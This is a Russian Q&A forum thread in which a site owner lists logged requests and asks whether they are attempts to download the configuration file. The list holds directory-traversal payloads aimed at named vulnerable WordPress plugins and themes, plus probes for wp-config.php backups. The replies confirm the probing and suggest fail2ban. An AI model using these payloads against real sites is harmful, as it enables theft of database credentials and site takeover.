Что делают эти запросы к сайту? Пытаются скачать файл конфигурации?

Question

Что делают эти запросы к сайту? Пытаются скачать файл конфигурации?

Дормидон Евлампиевич Гуру (4650), на голосовании 4 месяца назад

/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php

/wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php

/wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php

/wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php

/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php

/wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php

/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2F..%2Fwp-config.php

/wp-admin/admin-ajax.php?action=..%2Fwp-config.php

/wp-content/uploads/wp-config-backup.txt

/wp/wp-config.php.bak

/wp-config.2

/wp-config.zip

и еще 120 похожих запросов за 10 минут

Answer 1

Да, ковыряют уязвимости через wp-config.php для доступа к файлу конфигурации

Answer 2

Редис Александрович Оракул (79332) 5 месяцев назад

да

Answer 3

James Gosling Знаток (300) 4 месяца назад

настроить fail2ban